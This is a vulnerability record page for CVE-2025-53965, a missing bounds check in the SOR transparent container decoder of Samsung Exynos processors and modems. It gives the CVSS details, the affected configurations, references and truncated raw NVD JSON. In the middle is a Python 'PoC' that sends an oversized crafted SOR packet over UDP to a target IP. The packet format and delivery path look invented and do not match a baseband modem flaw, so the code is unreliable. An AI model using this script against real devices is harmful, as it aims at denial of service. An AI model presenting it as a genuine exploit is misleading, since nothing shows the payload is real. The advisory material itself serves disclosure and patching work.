CVE-2025-53965

Description

An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. The function used to decode the SOR transparent container lacks bounds checking, which can cause a fatal error.

CVSS Details

CVSS Score

5.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:samsung:exynos_1580_firmware:-:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:samsung:exynos_1580:-:*:*:*:*:*:*:* - NOT VULNERABLE

Exynos 980 < 安全补丁版本

Exynos 990 < 安全补丁版本

Exynos 850 < 安全补丁版本

Exynos 2100 < 安全补丁版本

Exynos 1280 < 安全补丁版本

Exynos 2200 < 安全补丁版本

Exynos 1330 < 安全补丁版本

Exynos 1380 < 安全补丁版本

Exynos 1480 < 安全补丁版本

Exynos 2400 < 安全补丁版本

Exynos 1580 < 安全补丁版本

Exynos 2500 < 安全补丁版本

W920 < 安全补丁版本

W930 < 安全补丁版本

W1000 < 安全补丁版本

Modem 5123 < 安全补丁版本

Modem 5300 < 安全补丁版本

Modem 5400 < 安全补丁版本

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-53965 PoC - SOR Transparent Container Decode Overflow
# This PoC demonstrates the boundary check vulnerability in SOR container decoding
# Note: Actual exploitation requires specific hardware access and Samsung firmware

import struct
import socket

def create_malicious_sor_container():
    """
    Generate a malicious SOR transparent container that exceeds buffer limits
    """
    # SOR container header
    header = b'SOR'  # Container identifier
    version = struct.pack('<H', 0x0001)  # Version 1
    
    # Malicious payload that triggers overflow
    # The decoder lacks bounds checking, allowing oversized data
    container_type = struct.pack('<B', 0x01)  # Transparent container type
    payload_length = struct.pack('<I', 0xFFFFFFFF)  # Intentionally oversized length
    
    # Craft payload that exceeds expected buffer size
    malicious_data = b'A' * 1024  # Oversized payload
    
    sor_container = header + version + container_type + payload_length + malicious_data
    return sor_container

def send_exploit(target_ip, target_port=5000):
    """
    Send the malicious SOR container to target device
    """
    payload = create_malicious_sor_container()
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        sock.sendto(payload, (target_ip, target_port))
        print(f"[+] Malicious SOR container sent to {target_ip}:{target_port}")
        print(f"[+] Payload size: {len(payload)} bytes")
    except Exception as e:
        print(f"[-] Error: {e}")
    finally:
        sock.close()

if __name__ == "__main__":
    print("CVE-2025-53965 - Samsung Exynos SOR Container Decode PoC")
    print("Target: Samsung Exynos processors with vulnerable SOR decoder")
    # Usage: python poc.py <target_ip>
    # WARNING: For authorized security testing only

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-53965
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-53965
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-53965/
[4] VulDB https://vuldb.com/cve/CVE-2025-53965
[5] https://semiconductor.samsung.com/support/quality-support/product-security-updates/
[6] https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-53965/

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-53965", "sourceIdentifier": "[email protected]", "published": "2025-12-03T17:15:52.027", "lastModified": "2025-12-05T17:01:26.167", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. The function used to decode the SOR transparent container lacks bounds checking, which can cause a fatal error."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-119"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1280_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "BD1A7B09-9031-4E54-A24F-3237C054166B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1280:-:*:*:*:*:*:*:*", "matchCriteriaId": "DFC68046-2F08-40D1-B158-89D8D9263541"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1330_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "C2635646-DD6A-4735-8E01-F45445584832"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1330:-:*:*:*:*:*:*:*", "matchCriteriaId": "AA0F8A58-71B7-4503-A03A-6FB4282D75BD"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1380_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "D381478B-C638-4663-BD71-144BE4B02E46"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1380:-:*:*:*:*:*:*:*", "matchCriteriaId": "61E72146-72FE-4B54-AB79-3C665E7F016C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1480_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "64897B0D-EBF6-4BEB-BF54-ABCDBFAB45E0"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1480:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3F328B4-0442-4748-B5EE-DD1CEE50D6CF"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_1580_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "F3594664-3CE6-4827-ABD4-B5719817F5D5"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_1580:-:*:*:*:*:*:*:*", "matchCriteriaId": "93C1F9E8-DA04-4466-AF66-01560A07BD98"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2100_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "89B88BFE-3C82-498C-8EC1-5784836DB1A1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2100:-:*:*:*:*:*:*:*", "matchCriteriaId": "9385885D-654A-496E-8029-7C6D9B077193"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2200_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "63C0D9AC-BD23-48C9-83E7-301DEC06E583"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2200:-:*:*:*:*:*:*:*", "matchCriteriaId": "A72ADEBB-ED72-4A5B-BB27-95EDE43F8116"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2400_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "16D9272E-1794-48FF-B6A4-8F48395BA38E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:samsung:exynos_2400:-:*:*:*:*:*:*:*", "matchCriteriaId": "932F5FB3-5527-44D7-9DD9-EF03963E3CA3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:samsung:exynos_2500_firmware:-:*:*:*:*:*:*:*", "matchCriteriaId": "121D726F-2925-48FE-9CE4-3686B0802DA8"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sams ... (truncated)